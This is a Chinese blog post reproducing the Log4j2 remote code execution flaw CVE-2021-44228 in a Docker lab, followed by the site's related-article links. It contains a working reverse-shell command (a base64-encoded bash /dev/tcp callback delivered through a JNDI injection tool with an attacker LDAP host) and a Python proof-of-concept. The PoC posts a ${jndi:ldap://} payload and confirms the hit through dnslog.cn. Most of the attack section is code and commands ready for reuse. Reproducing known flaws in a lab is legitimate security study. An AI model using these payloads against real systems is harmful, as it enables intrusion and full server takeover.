Apache Log4j2远程代码执行漏洞复现 CVE-2021-44228,python编写POC

最新推荐文章于 2024-08-12 09:02:22 发布
最新推荐文章于 2024-08-12 09:02:22 发布
阅读量5.8k 收藏 8
点赞数
分类专栏: 漏洞复现 文章标签: python 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/121952887
版权

环境搭建:

使用docker拉取:

[root@www /]# docker pull vulfocus/log4j2-rce-2021-12-09

运行:

[root@www /]# docker run -P vulfocus/log4j2-rce-2021-12-09

查看端口:


[root@www ]# docker ps                                                        
CONTAINER ID   IMAGE                            COMMAND                  CREATED          STATUS          PORTS                                         NAMES
4143c7d55448   vulfocus/log4j2-rce-2021-12-09   "java -jar /demo/dem…"   20 seconds ago   Up 19 seconds   0.0.0.0:51832->8080/tcp, :::51832->8080/tcp   happy_wescoff

环境启动后,POST方式访问http://your-ip:port即可看到页面。
在这里插入图片描述

漏洞复现:

在这里插入图片描述

反弹shell:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjExLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}” -A “192.168.33.11”

在这里插入图片描述
根据自己的java版本,最好每个都多试几次,我用的java 1.8.0_202 。
在这里插入图片描述
在这里插入图片描述

工具地址:
https://github.com/welk1n/JNDI-Injection-Exploit

POC编写:

import requests,random,time

url = "http://192.168.33.172:51832/hello"


def poc():
    try:
        session = requests.session()
        ret = session.get("http://www.dnslog.cn/getdomain.php?t=" + str(random.randint(100000, 999999)),
                          timeout=20).text

        poc="${jndi:ldap://%s/}"   %ret

        data = {"payload": f"{poc}"}

        requests.post(url,data)

        time.sleep(5)

        ret2 = session.get("http://www.dnslog.cn/getrecords.php?t=" + str(random.randint(100000, 999999)),
                          timeout=20).text
        if ret in ret2:
            print(f"{url}    存在Apache Log4j2远程代码执行漏洞 CVE-2021-44228")
    except:
        pass

poc()

运行结果:
在这里插入图片描述

~王
关注
专栏目录
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1417
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
2301_76225520的博客
04-18 1066
以及 LDAP即轻量级目录访问协议都是名称服务,不同的是 LDAP是一个协议,是和 HTTP 一样是通用的,而不止局限于 JAVA.比如用户对象可以有用户名、密码、邮件地址、角色等属性,计算机对象可以有IP地址、MAC地址、操作系统版本等属性。四个系列:< v1.14.2, < v1.13.5, < v1.12.7, < v1.11.6。而用户可以通过目录服务,针对打印机需求,根据分辨率等属性进行搜索获取符合条件的打印机对象。在名称服务中根据打印机名称获取打印机对象,并进行打印操作。
log4j_trunctate_poc:poc 测试如何截断堆栈跟踪
06-05
log4j_trunctate_poc poc 测试如何截断堆栈跟踪 介绍 Log4j 从 1.2.16 开始附带一个EnhancedPatternLayout类。 EnhancedPatternLayout能够截断堆栈跟踪消息,因此它们不会填满日志文件。 要启用此功能,对于每个输出,您需要修改从PatternLayout到EnhancedPatternLayout switch,并向ConversionPattern添加一个额外的标志。 作为一个例子改变这个: log4j.appender.CONSOLE.layout=org.apache.log4j.EnhancedPatternLayout log4j.appender.CONSOLE.layout.ConversionPattern=%-4r [%t] %-5p %c %x \u2013 %m%n %throwable
手把手教你复现Log4j2漏洞,千万别中招!
Java知音
12-13 2199
点击关注公众号,实用技术文章及时了解来源:blog.csdn.net/qq_40989258/article/details/1218623630x00 简介ApacheLog4j2是一个...
探索CVE-2021-44228漏洞log4j-shell-poc详解与实战
gitblog_00393的博客
08-12 274
探索CVE-2021-44228漏洞log4j-shell-poc详解与实战 log4j-shell-pocA Proof-Of-Concept for the CVE-2021-44228 vulnerability. 项目地址:https://gitcode.com/gh_mirrors/lo/log4j-shell-poc 项目简介 log4j-shell-poc 是一个针对近期曝光的严...
Struts2 CVE-2021-44228 log4j POC
不光要学,知识要能说出口
12-28 2936
随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的poc
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
siu~
10-31 563
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 5775
Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
漏洞环境搭建+复现CVE-2021-44228 Apache Log4j 远程代码执行
LJW_IIE的博客
02-15 3503
CVE-2021-44228 Apache Log4j 远程代码执行漏洞环境搭建+验证1 Apache Log4j1.1 log4j的简介1.2 log4j漏洞危害1.3 影响范围2 漏洞环境搭建2.1 工具2.2 靶机搭建2.3 漏洞利用2.3.1 构建POC代码2.3.2 测试3 修复建议 1 Apache Log4j 1.1 log4j的简介 Log4jApache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、
通过CVE-2021-43297漏洞Apache Dubbo<=2.7.13下实现RCE
「 虚幻私塾」
01-21 1659
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 目录* 0 前言 1 找源头 1.1 找到触发点 1.2 可用的gadget 1.3 向上推触发点 2 构造poc 2.1 开启HttpServer 2.2 hessian2序列化过程简述 3 poc 4 总结 5 Dubbo<=2.7.13可用的POC
Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸
离别歌
10-18 6321
周五晚上开始学习Apache HTTP Server(后文简称为Apache)mod_proxy的SSRF漏洞CVE-2021-40438),并在星球简单介绍了一下编译、调试Apache...
apache-log4j-poc-main.zip
12-16
APACHE log4j poc
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 2231
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Struts2框架下Log4j2漏洞检测方法分析与总结
Python_0011的博客
03-01 1134
在这里面要特别说明一下,burpsuite的被动插件扫描的方式,并不能完全发现Log4j2漏洞,因为有的log4j2漏洞需要特定的条件才能触发,有时候需要手工构造一个特殊URL路径,有时候需要发送一些框架特有的参数、消息头等等,有的框架如Struts2、Spring等需要构造特殊的数据包才能触发log4j2漏洞。,访问一个存在的Struts2框架的action地址,Struts2框架会检查请求参数名的长度,若长度超过默认的100个字符,请求参数名则会输出到debug日志中,触发log4j2漏洞
手把手复现Log4j2 漏洞,太可怕了。。
Java技术栈,分享最主流的Java技术
12-14 2900
来源:blog.csdn.net/qq_40989258/article/details/121862363 0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 0x01 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2.x <= 2.15.0-rc1 0x03 环境搭建 创建一个新的
【4】Apache Log4j2远程代码执行(2021.12.10)
司徒荆的博客
12-10 2017
Apache Log4j2远程代码执行(2021.12.10)
log4j2 RCE漏洞复现,2024年最新近期想跳槽的程序员必看
2301_79054215的博客
04-13 199
可以看到这边又出现了一个java的一个版本号信息:1.8.0_312。得到ok,显示payload=111。修改poc语句,都是可以成功回显所要验证的信息的。创建临时域名:2oaj3e.dnslog.cn。该域名显示被如下IP地址访问。
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
最新发布
08-22
CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4Shell或Log4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值